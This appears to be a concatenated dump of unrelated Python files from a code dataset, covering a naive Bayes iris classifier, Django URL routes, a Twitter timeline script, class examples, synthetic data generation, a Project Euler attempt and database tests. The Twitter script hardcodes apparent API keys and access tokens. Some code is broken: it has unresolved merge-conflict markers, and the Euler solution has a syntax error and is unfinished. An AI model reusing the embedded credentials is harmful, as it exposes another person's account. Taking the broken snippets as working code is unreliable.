fp = 1 / np.sqrt((2 * np.pi * (sd ** 2)))
sp = np.e ** (-((x - mean) ** 2) / (2 * (sd ** 2)))
return fp * sp
def posterior(x, means, sds, i):
numerator = f(x, means[i], sds[i])
denominator = 0
for k in range(0, 3):
denominator = denominator + f(x, means[k], sds[k])
return numerator / denominator
def classify(x, means, sds):
prob0 = posterior(x, means, sds, 0)
prob1 = posterior(x, means, sds, 1)
prob2 = posterior(x, means, sds, 2)
if prob0 > prob1 and prob0 > prob2:
return 0
elif prob1 > prob0 and prob1 > prob2:
return 1
else:
return 2
def validate(X_validation, target, means, sds):
guessed = 0
for i in range(0, X_validation.size):
prediction = classify(X_validation[i], means, sds)
print(prediction, " ", target[i])
if prediction == target[i]:
guessed = guessed + 1
return (guessed / X_validation.size) * 100
# STUDENT
k = validate(X_validation[:, 2], y_validation, means, sds)
print(k)
# Test out the code
flower_id = 8
predicted_class = classify(X_train[flower_id, 2], means, sds)
print("Predicted class", iris.target_names[predicted_class])
print("Flower belongs to class", iris.target_names[y_train[flower_id]])
|
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
# Examples:
# url(r'^$', 'trains.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
<<<<<<< HEAD
url(r'^contests/', include('contest.urls')),
=======
url(r'^contest/', include('contest.urls')),
>>>>>>> 8e796cacec1d781d3a9d7c69257924d5bde5b7df
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import twitter
CONSUMER_KEY="Tf0llJkFekN0fQRs3jm8D64BV"
CONSUMER_SECRET="iI909hsiksvYfotc9Ra8EPeA8dpCjShB6E2BlmDK31bu1hfLnd"
ACCESS_TOKEN_KEY="952559428619898881-Cimwl8COh51kdsM04xkxNN3mMV8Oy0n"
ACCESS_TOKEN_SECRET="66wC1hUBRI1kO0S5Wvj7vLYhBoKQCIPHQmx0vFFJwuJgw"
USER_NAME='FilipeDeschamps'
api = twitter.Api(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
statuses = api.GetUserTimeline(screen_name=USER_NAME)
print(statuses) |
class Stationery:
def __init__(self, title='Stationery'):
self.title = title
def draw(self):
print('Запуск отрисовки')
class Pen(Stationery):
def draw(self):
print(f'Запуск отрисовки объекта {self.title} типа {type(self)}')
class Pencil(Stationery):
def draw(self):
print(f'Запуск отрисовки объекта {self.title} типа {type(self)}')
class Handle(Stationery):
def draw(self):
print(f'Запуск отрисовки объекта {self.title} типа {type(self)}')
def do():
pen = Pen('pen')
pen.draw()
pencil = Pencil('pencil')
pencil.draw()
handle = Handle('handle')
handle.draw()
if __name__ == '__main__':
do()
|
import random
import math
import numpy as np
def data_pass_generator(n):
output = []
for i in range(n):
center = 0
blink = 0
left = 0
right = 0
for j in range(100):
[ rd ] = random.choices(range(0, 4), weights=[92,4,2,2])
if rd == 0:
center += 1
elif rd == 1:
blink += 1
elif rd == 2:
left += 1
else:
right += 1
output.append([center, blink, left, right])
return output
def data_non_pass_generator(n):
output = []
for i in range(n):
center = 0
blink = 0
left = 0
right = 0
seed = random.randrange(10,30)
for j in range(100):
[ rd ] = random.choices(range(0, 4), weights=[65,seed,5,5])
if rd == 0:
center += 1
elif rd == 1:
blink += 1
elif rd == 2:
left += 1
else:
right += 1
output.append([center, blink, left, right])
return output
# Ratio <pass : non-pass> = <7 : 3>
def get_eyetracking_data(n):
pass_cnt = math.floor(n / 100 * 70)
non_pass_cnt = n - pass_cnt
pass_data = data_pass_generator(pass_cnt)
non_pass_data = data_non_pass_generator(non_pass_cnt)
data = np.array(
pass_data +
non_pass_data
)
label = np.array(
[
1 for i in range(pass_cnt)
] +
[
0 for i in range(non_pass_cnt)
]
)
return data, label |
#Project Euler Problem 67
#Find the maximal sum through the triangle of 100 lines
M=[]
# Open the file import in to python
#f=open('smallTriangle.txt').readlines()
f=open('triangle.txt').readlines()
for line in f:
M.append(line.replace('\n','').split(' '))
print(M)
#Hold an array of sums
sum=[0]*100
sum[0]=int(M[0][0])
#Calculate the next sum
for i in range(0,99):
for j in range(0.i+1):
a=int(M[i][j])+int(M[i+1][j])#sum straight down
b=int(M[i][j])+int(M[i+1][j+1]) #sum diagonal
|
import json
import os.path
import pytest
import sqlalchemy_utils
import sys
from scripts import udf
from scripts import config as tcn
import tests.test_functions as db
from scripts import env_vars as env_vars
#from scripts import config as cn
def readJson(fileLoc):
with open(fileLoc) as f:
data = json.load(f)
return data
db.create_db_tables_if_not_exists()
mDictFile = readJson(tcn.jPath)
# to check on json or csv
# if both files present -- pass, if both files absent failed
# if one of the file is present - pass
@pytest.mark.parametrize(
"test_input,expected",
[(str(len(mDictFile)), 2)]
# i, ( str(mDictFile['data_platform']['action_type']), str('New')) ]
)
# check parameters
def test_param_head_count(test_input, expected):
assert eval(test_input) == expected
def test_python_version():
assert (sys.version_info[0] >= 3)
# check database if exists
def test_database_if_exist():
assert (sqlalchemy_utils.functions.database_exists(env_vars.postgres_endpoint) == True)
# check if action type is correct/valid
def test_action_type():
assert (mDictFile['data_platform']['action_type'].upper() in
tcn.valid_action_types)
testDataPath = '/tests/data/'
currentPath = os.path.abspath(os.getcwd()) + testDataPath
csv_new = '{}testData_new.csv'.format(currentPath)
# Read the json's
newAccount = readJson(tcn.jNewAccount)
updAccount = readJson(tcn.jUpdAccount)
delAccount = readJson(tcn.jDelAccount)
# Read the CSV's
newAccountCsv = udf.csvToJson(tcn.csv_new)
updAccountCsv = udf.csvToJson(tcn.csv_update)
delAccountCsv = udf.csvToJson(tcn.csv_delete)
undelAccountCsv = udf.csvToJson(tcn.csv_undelete)
enableAccountCsv = udf.csvToJson(tcn.csv_enableaccount)
disableAccountCsv = udf.csvToJson(tcn.csv_disableaccount)
enableEtlCsv = udf.csvToJson(tcn.csv_enable_etl)
disableEtlCsv = udf.csvToJson(tcn.csv_disable_etl)
enableDualModeCsv = udf.csvToJson(tcn.csv_enable_dualmode)
disableDualModeCsv = udf.csvToJson(tcn.csv_disable_dualmode)
updateRetentionCsv = udf.csvToJson(tcn.csv_update_retention)
# Test Functions ..
def test_csv_add_record():
assert (db.new_crecord(newAccountCsv) == 'Record Inserted')
def test_csv_update_record():
assert (db.update_a_crecord(updAccountCsv) == "Record Updated")
def test_csv_duplicate_record():
assert (db.duplicate_a_crecord(newAccountCsv) == "Record Duplicated")
def test_csv_enable_account():
assert (db.enable_field(enableAccountCsv) == "Account Enabled")
def test_csv_disable_account():
assert (db.disable_field(disableAccountCsv) == "Account Disabled")
def test_csv_enable_etl():
assert (db.enable_field(enableEtlCsv) == "ETL Enabled")
def test_csv_disable_etl():
assert (db.disable_field(disableEtlCsv) == "ETL Disabled")
def test_csv_enable_dual_send():
assert (db.enable_field(enableDualModeCsv) == "Dual Send Enabled")
def test_csv_disable_dual_send():
assert (db.disable_field(disableDualModeCsv) == 'Dual Send Disabled')
def test_csv_retention_period():
assert (db.update_retention(updateRetentionCsv) == 'Retention Updated')
def test_csv_delete_record():
assert (db.delete_a_crecord(delAccountCsv) == "Record Deleted")
def test_json_add_record():
assert (db.new_jrecord(newAccount) == "Record Inserted")
def test_json_update_record():
assert (db.update_a_jrecord(updAccount) == "Record Updated")
def test_json_duplicate_record():
assert (db.duplicate_a_jrecord(newAccount) == "Record Duplicated")
def test_json_delete_record():
assert (db.delete_a_jrecord(delAccount) == "Record Deleted")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.